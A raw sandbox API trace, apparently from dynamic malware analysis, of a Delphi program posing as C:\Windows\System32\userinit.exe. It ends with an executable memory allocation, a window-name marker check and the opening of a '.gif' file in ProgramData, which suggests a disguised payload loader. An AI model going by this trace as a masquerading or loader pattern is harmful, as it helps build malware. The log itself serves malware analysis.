[0127.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x42, lpLCData=0x6fcd0, cchData=256 | out: lpLCData="November") returned 9
[0127.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x4f, lpLCData=0x6fcd0, cchData=256 | out: lpLCData="Dec") returned 4
[0127.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x43, lpLCData=0x6fcd0, cchData=256 | out: lpLCData="December") returned 9
[0127.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x37, lpLCData=0x6fcd0, cchData=256 | out: lpLCData="Sun") returned 4
[0127.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x30, lpLCData=0x6fcd0, cchData=256 | out: lpLCData="Sunday") returned 7
[0127.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x31, lpLCData=0x6fcd0, cchData=256 | out: lpLCData="Mon") returned 4
[0127.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x2a, lpLCData=0x6fcd0, cchData=256 | out: lpLCData="Monday") returned 7
[0127.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x32, lpLCData=0x6fcd0, cchData=256 | out: lpLCData="Tue") returned 4
[0127.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x2b, lpLCData=0x6fcd0, cchData=256 | out: lpLCData="Tuesday") returned 8
[0127.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x33, lpLCData=0x6fcd0, cchData=256 | out: lpLCData="Wed") returned 4
[0127.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x2c, lpLCData=0x6fcd0, cchData=256 | out: lpLCData="Wednesday") returned 10
[0127.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x34, lpLCData=0x6fcd0, cchData=256 | out: lpLCData="Thu") returned 4
[0127.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x2d, lpLCData=0x6fcd0, cchData=256 | out: lpLCData="Thursday") returned 9
[0127.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x35, lpLCData=0x6fcd0, cchData=256 | out: lpLCData="Fri") returned 4
[0127.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x2e, lpLCData=0x6fcd0, cchData=256 | out: lpLCData="Friday") returned 7
[0127.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x36, lpLCData=0x6fcd0, cchData=256 | out: lpLCData="Sat") returned 4
[0127.238] GetLocaleInfoA (in: Locale=0x409, LCType=0x2f, lpLCData=0x6fcd0, cchData=256 | out: lpLCData="Saturday") returned 9
[0127.238] GetThreadLocale () returned 0x409
[0127.238] GetLocaleInfoA (in: Locale=0x409, LCType=0x14, lpLCData=0x6fd2c, cchData=256 | out: lpLCData="$") returned 2
[0127.238] GetLocaleInfoA (in: Locale=0x409, LCType=0x1b, lpLCData=0x6fd2c, cchData=256 | out: lpLCData="0") returned 2
[0127.238] GetLocaleInfoA (in: Locale=0x409, LCType=0x1c, lpLCData=0x6fd2c, cchData=256 | out: lpLCData="0") returned 2
[0127.238] GetLocaleInfoA (in: Locale=0x409, LCType=0xf, lpLCData=0x6fe24, cchData=2 | out: lpLCData=",") returned 2
[0127.238] GetLocaleInfoA (in: Locale=0x409, LCType=0xe, lpLCData=0x6fe24, cchData=2 | out: lpLCData=".") returned 2
[0127.238] GetLocaleInfoA (in: Locale=0x409, LCType=0x19, lpLCData=0x6fd2c, cchData=256 | out: lpLCData="2") returned 2
[0127.238] GetLocaleInfoA (in: Locale=0x409, LCType=0x1d, lpLCData=0x6fe24, cchData=2 | out: lpLCData="/") returned 2
[0127.238] GetLocaleInfoA (in: Locale=0x409, LCType=0x1f, lpLCData=0x6fd2c, cchData=256 | out: lpLCData="M/d/yyyy") returned 9
[0127.238] GetThreadLocale () returned 0x409
[0127.238] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x6fcf8, cchData=256 | out: lpLCData="1") returned 2
[0127.238] GetLocaleInfoA (in: Locale=0x409, LCType=0x20, lpLCData=0x6fd2c, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20
[0127.238] GetThreadLocale () returned 0x409
[0127.238] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x6fcf8, cchData=256 | out: lpLCData="1") returned 2
[0127.238] GetLocaleInfoA (in: Locale=0x409, LCType=0x1e, lpLCData=0x6fe24, cchData=2 | out: lpLCData=":") returned 2
[0127.238] GetLocaleInfoA (in: Locale=0x409, LCType=0x28, lpLCData=0x6fd2c, cchData=256 | out: lpLCData="AM") returned 3
[0127.238] GetLocaleInfoA (in: Locale=0x409, LCType=0x29, lpLCData=0x6fd2c, cchData=256 | out: lpLCData="PM") returned 3
[0127.238] GetLocaleInfoA (in: Locale=0x409, LCType=0x25, lpLCData=0x6fd2c, cchData=256 | out: lpLCData="0") returned 2
[0127.238] GetLocaleInfoA (in: Locale=0x409, LCType=0x23, lpLCData=0x6fd2c, cchData=256 | out: lpLCData="0") returned 2
[0127.238] GetLocaleInfoA (in: Locale=0x409, LCType=0x1005, lpLCData=0x6fd2c, cchData=256 | out: lpLCData="0") returned 2
[0127.238] GetLocaleInfoA (in: Locale=0x409, LCType=0xc, lpLCData=0x6fe24, cchData=2 | out: lpLCData=",") returned 2
[0127.238] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x758f0000
[0127.238] GetProcAddress (hModule=0x758f0000, lpProcName="VariantChangeTypeEx") returned 0x758f4c28
[0127.238] GetProcAddress (hModule=0x758f0000, lpProcName="VarNeg") returned 0x7596c802
[0127.238] GetProcAddress (hModule=0x758f0000, lpProcName="VarNot") returned 0x7596ec66
[0127.238] GetProcAddress (hModule=0x758f0000, lpProcName="VarAdd") returned 0x75915934
[0127.238] GetProcAddress (hModule=0x758f0000, lpProcName="VarSub") returned 0x7596d332
[0127.239] GetProcAddress (hModule=0x758f0000, lpProcName="VarMul") returned 0x7596dbd4
[0127.239] GetProcAddress (hModule=0x758f0000, lpProcName="VarDiv") returned 0x7596e405
[0127.239] GetProcAddress (hModule=0x758f0000, lpProcName="VarIdiv") returned 0x7596f00a
[0127.239] GetProcAddress (hModule=0x758f0000, lpProcName="VarMod") returned 0x7596f15e
[0127.239] GetProcAddress (hModule=0x758f0000, lpProcName="VarAnd") returned 0x75915a98
[0127.239] GetProcAddress (hModule=0x758f0000, lpProcName="VarOr") returned 0x7596ecfa
[0127.239] GetProcAddress (hModule=0x758f0000, lpProcName="VarXor") returned 0x7596ee2e
[0127.239] GetProcAddress (hModule=0x758f0000, lpProcName="VarCmp") returned 0x7590b0dc
[0127.239] GetProcAddress (hModule=0x758f0000, lpProcName="VarI4FromStr") returned 0x75906fab
[0127.239] GetProcAddress (hModule=0x758f0000, lpProcName="VarR4FromStr") returned 0x759101a0
[0127.239] GetProcAddress (hModule=0x758f0000, lpProcName="VarR8FromStr") returned 0x7590699e
[0127.239] GetProcAddress (hModule=0x758f0000, lpProcName="VarDateFromStr") returned 0x75916ba7
[0127.239] GetProcAddress (hModule=0x758f0000, lpProcName="VarCyFromStr") returned 0x75936c12
[0127.239] GetProcAddress (hModule=0x758f0000, lpProcName="VarBoolFromStr") returned 0x7590dbd1
[0127.239] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromCy") returned 0x75917fdc
[0127.239] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromDate") returned 0x75907a2a
[0127.239] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromBool") returned 0x75910355
[0127.240] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="") returned 0x60
[0127.240] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x64
[0127.240] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x68
[0127.240] GetDC (hWnd=0x0) returned 0x2301087a
[0127.240] GetDeviceCaps (hdc=0x2301087a, index=90) returned 96
[0127.240] ReleaseDC (hWnd=0x0, hDC=0x2301087a) returned 1
[0127.240] GetDC (hWnd=0x0) returned 0x2301087a
[0127.240] GetDeviceCaps (hdc=0x2301087a, index=104) returned 0
[0127.240] ReleaseDC (hWnd=0x0, hDC=0x2301087a) returned 1
[0127.240] CreatePalette (plpal=0x6fa88) returned 0x2e080840
[0127.240] GetStockObject (i=7) returned 0x1b00017
[0127.240] GetStockObject (i=5) returned 0x1900015
[0127.240] GetStockObject (i=13) returned 0x18a002e
[0127.240] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0127.240] MulDiv (nNumber=8, nNumerator=96, nDenominator=72) returned 11
[0127.240] GetModuleHandleA (lpModuleName="USER32.DLL") returned 0x757b0000
[0127.241] LoadStringA (in: hInstance=0x400000, uID=0xff4d, lpBuffer=0x6fa84, cchBufferMax=1024 | out: lpBuffer="Alt+") returned 0x4
[0127.241] LoadStringA (in: hInstance=0x400000, uID=0xff4c, lpBuffer=0x6fa84, cchBufferMax=1024 | out: lpBuffer="Ctrl+") returned 0x5
[0127.241] LoadStringA (in: hInstance=0x400000, uID=0xff4b, lpBuffer=0x6fa84, cchBufferMax=1024 | out: lpBuffer="Shift+") returned 0x6
[0127.241] LoadStringA (in: hInstance=0x400000, uID=0xff4a, lpBuffer=0x6fa84, cchBufferMax=1024 | out: lpBuffer="Del") returned 0x3
[0127.241] LoadStringA (in: hInstance=0x400000, uID=0xff49, lpBuffer=0x6fa84, cchBufferMax=1024 | out: lpBuffer="Ins") returned 0x3
[0127.241] LoadStringA (in: hInstance=0x400000, uID=0xff48, lpBuffer=0x6fa84, cchBufferMax=1024 | out: lpBuffer="Down") returned 0x4
[0127.241] LoadStringA (in: hInstance=0x400000, uID=0xff47, lpBuffer=0x6fa84, cchBufferMax=1024 | out: lpBuffer="Right") returned 0x5
[0127.241] LoadStringA (in: hInstance=0x400000, uID=0xff46, lpBuffer=0x6fa84, cchBufferMax=1024 | out: lpBuffer="Up") returned 0x2
[0127.241] LoadStringA (in: hInstance=0x400000, uID=0xff45, lpBuffer=0x6fa84, cchBufferMax=1024 | out: lpBuffer="Left") returned 0x4
[0127.241] LoadStringA (in: hInstance=0x400000, uID=0xff44, lpBuffer=0x6fa84, cchBufferMax=1024 | out: lpBuffer="Home") returned 0x4
[0127.241] LoadStringA (in: hInstance=0x400000, uID=0xff43, lpBuffer=0x6fa84, cchBufferMax=1024 | out: lpBuffer="End") returned 0x3
[0127.241] LoadStringA (in: hInstance=0x400000, uID=0xff42, lpBuffer=0x6fa84, cchBufferMax=1024 | out: lpBuffer="PgDn") returned 0x4
[0127.241] LoadStringA (in: hInstance=0x400000, uID=0xff41, lpBuffer=0x6fa84, cchBufferMax=1024 | out: lpBuffer="PgUp") returned 0x4
[0127.241] LoadStringA (in: hInstance=0x400000, uID=0xff40, lpBuffer=0x6fa84, cchBufferMax=1024 | out: lpBuffer="Space") returned 0x5
[0127.241] LoadStringA (in: hInstance=0x400000, uID=0xff5f, lpBuffer=0x6fa84, cchBufferMax=1024 | out: lpBuffer="Enter") returned 0x5
[0127.241] LoadStringA (in: hInstance=0x400000, uID=0xff5e, lpBuffer=0x6fa84, cchBufferMax=1024 | out: lpBuffer="Esc") returned 0x3
[0127.241] LoadStringA (in: hInstance=0x400000, uID=0xff5d, lpBuffer=0x6fa84, cchBufferMax=1024 | out: lpBuffer="Tab") returned 0x3
[0127.241] LoadStringA (in: hInstance=0x400000, uID=0xff5c, lpBuffer=0x6fa84, cchBufferMax=1024 | out: lpBuffer="BkSp") returned 0x4
[0127.241] LoadStringA (in: hInstance=0x400000, uID=0xff06, lpBuffer=0x6fa84, cchBufferMax=1024 | out: lpBuffer="Window Text") returned 0xb
[0127.241] LoadStringA (in: hInstance=0x400000, uID=0xff05, lpBuffer=0x6fa84, cchBufferMax=1024 | out: lpBuffer="Window Frame") returned 0xc
[0127.241] LoadStringA (in: hInstance=0x400000, uID=0xff04, lpBuffer=0x6fa84, cchBufferMax=1024 | out: lpBuffer="Window Background") returned 0x11
[0127.241] LoadStringA (in: hInstance=0x400000, uID=0xff03, lpBuffer=0x6fa84, cchBufferMax=1024 | out: lpBuffer="3D Light") returned 0x8
[0127.241] LoadStringA (in: hInstance=0x400000, uID=0xff02, lpBuffer=0x6fa84, cchBufferMax=1024 | out: lpBuffer="3D Dark Shadow") returned 0xe
[0127.241] LoadStringA (in: hInstance=0x400000, uID=0xff01, lpBuffer=0x6fa84, cchBufferMax=1024 | out: lpBuffer="Scroll Bar") returned 0xa
[0127.241] LoadStringA (in: hInstance=0x400000, uID=0xff00, lpBuffer=0x6fa84, cchBufferMax=1024 | out: lpBuffer="None") returned 0x4
[0127.241] LoadStringA (in: hInstance=0x400000, uID=0xff1f, lpBuffer=0x6fa84, cchBufferMax=1024 | out: lpBuffer="Menu Text") returned 0x9
[0127.241] LoadStringA (in: hInstance=0x400000, uID=0xff1e, lpBuffer=0x6fa84, cchBufferMax=1024 | out: lpBuffer="Menu Background") returned 0xf
[0127.241] LoadStringA (in: hInstance=0x400000, uID=0xff1d, lpBuffer=0x6fa84, cchBufferMax=1024 | out: lpBuffer="Info Text") returned 0x9
[0127.241] LoadStringA (in: hInstance=0x400000, uID=0xff1c, lpBuffer=0x6fa84, cchBufferMax=1024 | out: lpBuffer="Info Background") returned 0xf
[0127.241] LoadStringA (in: hInstance=0x400000, uID=0xff1b, lpBuffer=0x6fa84, cchBufferMax=1024 | out: lpBuffer="Inactive Caption Text") returned 0x15
[0127.241] LoadStringA (in: hInstance=0x400000, uID=0xff1a, lpBuffer=0x6fa84, cchBufferMax=1024 | out: lpBuffer="Inactive Caption") returned 0x10
[0127.241] LoadStringA (in: hInstance=0x400000, uID=0xff19, lpBuffer=0x6fa84, cchBufferMax=1024 | out: lpBuffer="Inactive Border") returned 0xf
[0127.242] LoadStringA (in: hInstance=0x400000, uID=0xff18, lpBuffer=0x6fa84, cchBufferMax=1024 | out: lpBuffer="Highlight Text") returned 0xe
[0127.242] LoadStringA (in: hInstance=0x400000, uID=0xff17, lpBuffer=0x6fa84, cchBufferMax=1024 | out: lpBuffer="Highlight Background") returned 0x14
[0127.242] LoadStringA (in: hInstance=0x400000, uID=0xff16, lpBuffer=0x6fa84, cchBufferMax=1024 | out: lpBuffer="Gray Text") returned 0x9
[0127.242] LoadStringA (in: hInstance=0x400000, uID=0xff15, lpBuffer=0x6fa84, cchBufferMax=1024 | out: lpBuffer="Default") returned 0x7
[0127.242] LoadStringA (in: hInstance=0x400000, uID=0xff14, lpBuffer=0x6fa84, cchBufferMax=1024 | out: lpBuffer="Caption Text") returned 0xc
[0127.242] LoadStringA (in: hInstance=0x400000, uID=0xff13, lpBuffer=0x6fa84, cchBufferMax=1024 | out: lpBuffer="Button Text") returned 0xb
[0127.242] LoadStringA (in: hInstance=0x400000, uID=0xff12, lpBuffer=0x6fa84, cchBufferMax=1024 | out: lpBuffer="Button Shadow") returned 0xd
[0127.242] LoadStringA (in: hInstance=0x400000, uID=0xff11, lpBuffer=0x6fa84, cchBufferMax=1024 | out: lpBuffer="Button Highlight") returned 0x10
[0127.242] LoadStringA (in: hInstance=0x400000, uID=0xff10, lpBuffer=0x6fa84, cchBufferMax=1024 | out: lpBuffer="Button Face") returned 0xb
[0127.242] LoadStringA (in: hInstance=0x400000, uID=0xff2f, lpBuffer=0x6fa84, cchBufferMax=1024 | out: lpBuffer="Background") returned 0xa
[0127.242] LoadStringA (in: hInstance=0x400000, uID=0xff2e, lpBuffer=0x6fa84, cchBufferMax=1024 | out: lpBuffer="Application Workspace") returned 0x15
[0127.242] LoadStringA (in: hInstance=0x400000, uID=0xff2d, lpBuffer=0x6fa84, cchBufferMax=1024 | out: lpBuffer="Active Caption") returned 0xe
[0127.242] LoadStringA (in: hInstance=0x400000, uID=0xff2c, lpBuffer=0x6fa84, cchBufferMax=1024 | out: lpBuffer="Active Border") returned 0xd
[0127.242] LoadStringA (in: hInstance=0x400000, uID=0xff2b, lpBuffer=0x6fa84, cchBufferMax=1024 | out: lpBuffer="Medium Gray") returned 0xb
[0127.242] LoadStringA (in: hInstance=0x400000, uID=0xff2a, lpBuffer=0x6fa84, cchBufferMax=1024 | out: lpBuffer="Cream") returned 0x5
[0127.242] LoadStringA (in: hInstance=0x400000, uID=0xff29, lpBuffer=0x6fa84, cchBufferMax=1024 | out: lpBuffer="Sky Blue") returned 0x8
[0127.242] LoadStringA (in: hInstance=0x400000, uID=0xff28, lpBuffer=0x6fa84, cchBufferMax=1024 | out: lpBuffer="Money Green") returned 0xb
[0127.242] LoadStringA (in: hInstance=0x400000, uID=0xff27, lpBuffer=0x6fa84, cchBufferMax=1024 | out: lpBuffer="White") returned 0x5
[0127.242] LoadStringA (in: hInstance=0x400000, uID=0xff26, lpBuffer=0x6fa84, cchBufferMax=1024 | out: lpBuffer="Aqua") returned 0x4
[0127.242] LoadStringA (in: hInstance=0x400000, uID=0xff25, lpBuffer=0x6fa84, cchBufferMax=1024 | out: lpBuffer="Fuchsia") returned 0x7
[0127.242] LoadStringA (in: hInstance=0x400000, uID=0xff24, lpBuffer=0x6fa84, cchBufferMax=1024 | out: lpBuffer="Blue") returned 0x4
[0127.242] LoadStringA (in: hInstance=0x400000, uID=0xff23, lpBuffer=0x6fa84, cchBufferMax=1024 | out: lpBuffer="Yellow") returned 0x6
[0127.242] LoadStringA (in: hInstance=0x400000, uID=0xff22, lpBuffer=0x6fa84, cchBufferMax=1024 | out: lpBuffer="Lime") returned 0x4
[0127.242] LoadStringA (in: hInstance=0x400000, uID=0xff21, lpBuffer=0x6fa84, cchBufferMax=1024 | out: lpBuffer="Red") returned 0x3
[0127.242] LoadStringA (in: hInstance=0x400000, uID=0xff20, lpBuffer=0x6fa84, cchBufferMax=1024 | out: lpBuffer="Silver") returned 0x6
[0127.242] LoadStringA (in: hInstance=0x400000, uID=0xff3f, lpBuffer=0x6fa84, cchBufferMax=1024 | out: lpBuffer="Gray") returned 0x4
[0127.242] LoadStringA (in: hInstance=0x400000, uID=0xff3e, lpBuffer=0x6fa84, cchBufferMax=1024 | out: lpBuffer="Teal") returned 0x4
[0127.242] LoadStringA (in: hInstance=0x400000, uID=0xff3d, lpBuffer=0x6fa84, cchBufferMax=1024 | out: lpBuffer="Purple") returned 0x6
[0127.242] LoadStringA (in: hInstance=0x400000, uID=0xff3c, lpBuffer=0x6fa84, cchBufferMax=1024 | out: lpBuffer="Navy") returned 0x4
[0127.242] LoadStringA (in: hInstance=0x400000, uID=0xff3b, lpBuffer=0x6fa84, cchBufferMax=1024 | out: lpBuffer="Olive") returned 0x5
[0127.242] LoadStringA (in: hInstance=0x400000, uID=0xff3a, lpBuffer=0x6fa84, cchBufferMax=1024 | out: lpBuffer="Green") returned 0x5
[0127.243] LoadStringA (in: hInstance=0x400000, uID=0xff39, lpBuffer=0x6fa84, cchBufferMax=1024 | out: lpBuffer="Maroon") returned 0x6
[0127.243] LoadStringA (in: hInstance=0x400000, uID=0xff38, lpBuffer=0x6fa84, cchBufferMax=1024 | out: lpBuffer="Black") returned 0x5
[0127.243] RegisterClipboardFormatA (lpszFormat="Delphi Picture") returned 0xc157
[0127.243] RegisterClipboardFormatA (lpszFormat="Delphi Component") returned 0xc158
[0127.243] GetVersion () returned 0x1db10106
[0127.243] GetCurrentProcessId () returned 0x854
[0127.243] GlobalAddAtomA (lpString="Delphi00000854") returned 0xc132
[0127.243] GetCurrentThreadId () returned 0x860
[0127.243] GlobalAddAtomA (lpString="ControlOfs0040000000000860") returned 0xc131
[0127.243] RegisterClipboardFormatA (lpszFormat="ControlOfs0040000000000860") returned 0xc16f
[0127.243] GetProcAddress (hModule=0x757b0000, lpProcName="GetMonitorInfoA") returned 0x757bc34e
[0127.243] GetProcAddress (hModule=0x757b0000, lpProcName="GetSystemMetrics") returned 0x757c67cf
[0127.243] GetSystemMetrics (nIndex=19) returned 1
[0127.249] GetSystemMetrics (nIndex=75) returned 1
[0127.249] SystemParametersInfoA (in: uiAction=0x68, uiParam=0x0, pvParam=0x581310, fWinIni=0x0 | out: pvParam=0x581310) returned 1
[0127.249] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0127.249] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015
[0127.249] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ff9) returned 0x7022d
[0127.249] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8b) returned 0x1001b
[0127.249] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8a) returned 0x10019
[0127.249] LoadCursorA (hInstance=0x0, lpCursorName=0x7f88) returned 0x10017
[0127.250] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffa) returned 0x50221
[0127.250] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffb) returned 0x5021d
[0127.250] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffc) returned 0x60217
[0127.250] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffd) returned 0x60215
[0127.250] LoadCursorA (hInstance=0x400000, lpCursorName=0x7fff) returned 0x60203
[0127.250] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffe) returned 0x60201
[0127.251] LoadCursorA (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007
[0127.251] LoadCursorA (hInstance=0x0, lpCursorName=0x7f04) returned 0x1000b
[0127.251] LoadCursorA (hInstance=0x0, lpCursorName=0x7f84) returned 0x10011
[0127.251] LoadCursorA (hInstance=0x0, lpCursorName=0x7f82) returned 0x1000d
[0127.251] LoadCursorA (hInstance=0x0, lpCursorName=0x7f85) returned 0x10013
[0127.251] LoadCursorA (hInstance=0x0, lpCursorName=0x7f83) returned 0x1000f
[0127.251] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015
[0127.251] LoadCursorA (hInstance=0x0, lpCursorName=0x7f01) returned 0x10005
[0127.251] LoadCursorA (hInstance=0x0, lpCursorName=0x7f03) returned 0x10009
[0127.251] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0127.251] GetKeyboardLayout (idThread=0x0) returned 0x4090409
[0127.251] GetDC (hWnd=0x0) returned 0x2301087a
[0127.251] GetDeviceCaps (hdc=0x2301087a, index=90) returned 96
[0127.251] ReleaseDC (hWnd=0x0, hDC=0x2301087a) returned 1
[0127.251] GetProcAddress (hModule=0x757b0000, lpProcName="EnumDisplayMonitors") returned 0x757c34a3
[0127.251] EnumDisplayMonitors (hdc=0x0, lprcClip=0x0, lpfnEnum=0x444d6c, dwData=0x58155c) returned 1
[0127.251] SystemParametersInfoA (in: uiAction=0x1f, uiParam=0x3c, pvParam=0x6fdef, fWinIni=0x0 | out: pvParam=0x6fdef) returned 1
[0127.251] CreateFontIndirectA (lplf=0x6fdef) returned 0x1d0a0873
[0127.251] GetObjectA (in: h=0x1d0a0873, c=60, pv=0x6fbe0 | out: pv=0x6fbe0) returned 60
[0127.252] SystemParametersInfoA (in: uiAction=0x29, uiParam=0x0, pvParam=0x6fc9b, fWinIni=0x0 | out: pvParam=0x6fc9b) returned 1
[0127.252] CreateFontIndirectA (lplf=0x6fd77) returned 0x190a084f
[0127.252] GetObjectA (in: h=0x190a084f, c=60, pv=0x6fbe0 | out: pv=0x6fbe0) returned 60
[0127.252] CreateFontIndirectA (lplf=0x6fd3b) returned 0x230a0248
[0127.252] GetObjectA (in: h=0x230a0248, c=60, pv=0x6fbe0 | out: pv=0x6fbe0) returned 60
[0127.252] LoadIconA (hInstance=0x400000, lpIconName="MAINICON") returned 0x0
[0127.252] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x6fd4f, nSize=0x100 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0127.252] OemToCharA (in: pSrc="C:\\Windows\\System32\\userinit.exe", pDst=0x6fd4f | out: pDst="C:\\Windows\\System32\\userinit.exe") returned 1
[0127.252] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x40) returned 0x1f0000
[0127.252] GetClassInfoA (in: hInstance=0x400000, lpClassName="TApplication", lpWndClass=0x6fd04 | out: lpWndClass=0x6fd04) returned 0
[0127.252] RegisterClassA (lpWndClass=0x451c88) returned 0x20c167
[0127.252] GetSystemMetrics (nIndex=0) returned 1440
[0127.252] GetSystemMetrics (nIndex=1) returned 900
[0127.252] CreateWindowExA (dwExStyle=0x0, lpClassName="TApplication", lpWindowName="userinit", dwStyle=0x84ca0000, X=720, Y=450, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x701e8
[0127.256] SetWindowLongA (hWnd=0x701e8, nIndex=-4, dwNewLong=2035695) returned 4219500
[0127.256] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0127.256] SendMessageA (hWnd=0x701e8, Msg=0x80, wParam=0x1, lParam=0x10027) returned 0x0
[0127.256] DefWindowProcA (hWnd=0x701e8, Msg=0x80, wParam=0x1, lParam=0x10027) returned 0x0
[0127.268] DefWindowProcA (hWnd=0x701e8, Msg=0x7f, wParam=0x2, lParam=0x0) returned 0x601ff
[0127.268] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0127.268] SetClassLongA (hWnd=0x701e8, nIndex=-14, dwNewLong=65575) returned 0x0
[0127.269] GetSystemMenu (hWnd=0x701e8, bRevert=0) returned 0x501cb
[0127.271] DeleteMenu (hMenu=0x501cb, uPosition=0xf030, uFlags=0x0) returned 1
[0127.271] DeleteMenu (hMenu=0x501cb, uPosition=0xf000, uFlags=0x0) returned 1
[0127.271] DeleteMenu (hMenu=0x501cb, uPosition=0xf010, uFlags=0x0) returned 1
[0127.271] GetKeyboardLayoutList (in: nBuff=64, lpList=0x6fcd0 | out: lpList=0x6fcd0) returned 1
[0127.272] GetModuleHandleA (lpModuleName="USER32") returned 0x757b0000
[0127.272] GetProcAddress (hModule=0x757b0000, lpProcName="AnimateWindow") returned 0x757e0620
[0127.273] GetModuleHandleA (lpModuleName="comctl32.dll") returned 0x6cc60000
[0127.273] GetProcAddress (hModule=0x6cc60000, lpProcName="InitializeFlatSB") returned 0x6cc9266f
[0127.273] GetProcAddress (hModule=0x6cc60000, lpProcName="UninitializeFlatSB") returned 0x6cc92542
[0127.273] GetProcAddress (hModule=0x6cc60000, lpProcName="FlatSB_GetScrollProp") returned 0x6cc91d29
[0127.273] GetProcAddress (hModule=0x6cc60000, lpProcName="FlatSB_SetScrollProp") returned 0x6cc9238d
[0127.273] GetProcAddress (hModule=0x6cc60000, lpProcName="FlatSB_EnableScrollBar") returned 0x6cc920c9
[0127.273] GetProcAddress (hModule=0x6cc60000, lpProcName="FlatSB_ShowScrollBar") returned 0x6cc91fdb
[0127.273] GetProcAddress (hModule=0x6cc60000, lpProcName="FlatSB_GetScrollRange") returned 0x6cc91e8d
[0127.273] GetProcAddress (hModule=0x6cc60000, lpProcName="FlatSB_GetScrollInfo") returned 0x6cc91f0f
[0127.273] GetProcAddress (hModule=0x6cc60000, lpProcName="FlatSB_GetScrollPos") returned 0x6cc91ccd
[0127.273] GetProcAddress (hModule=0x6cc60000, lpProcName="FlatSB_SetScrollPos") returned 0x6cc9216d
[0127.273] GetProcAddress (hModule=0x6cc60000, lpProcName="FlatSB_SetScrollInfo") returned 0x6cc922be
[0127.273] GetProcAddress (hModule=0x6cc60000, lpProcName="FlatSB_SetScrollRange") returned 0x6cc921e2
[0127.273] GetModuleHandleA (lpModuleName="User32.dll") returned 0x757b0000
[0127.273] GetProcAddress (hModule=0x757b0000, lpProcName="SetLayeredWindowAttributes") returned 0x757ba6dc
[0127.274] RegisterClipboardFormatA (lpszFormat="TaskbarCreated") returned 0xc078
[0127.274] RegisterClipboardFormatA (lpszFormat="commdlg_help") returned 0xc0eb
[0127.274] RegisterClipboardFormatA (lpszFormat="commdlg_FindReplace") returned 0xc0fc
[0127.274] GetCurrentThreadId () returned 0x860
[0127.274] GlobalAddAtomA (lpString="WndProcPtr0040000000000860") returned 0xc130
[0127.274] VirtualAlloc (lpAddress=0x584000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x584000
[0127.274] ShowWindow (hWnd=0x701e8, nCmdShow=0) returned 0
[0127.275] FindWindowA (lpClassName=0x0, lpWindowName="marxvxinhhm0131") returned 0x0
[0127.275] CreateFileA (lpFileName="C:\\ProgramData\\tempa\\marxvxinhhmg.gif" (normalized: "c:\\programdata\\tempa\\marxvxinhhmg.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x98
[0127.275] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x6fa50*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x6fa50*=0) returned 0x0
[0127.275] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x6fa48*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x6fa48*=0) returned 0x0
[0127.275] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x6fa48*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x6fa48*=0) returned 0x10be00
[0127.275] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x6fa48*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x6fa48*=0) returned 0x0
[0127.276] GlobalLock (hMem=0x350004) returned 0x22e0020
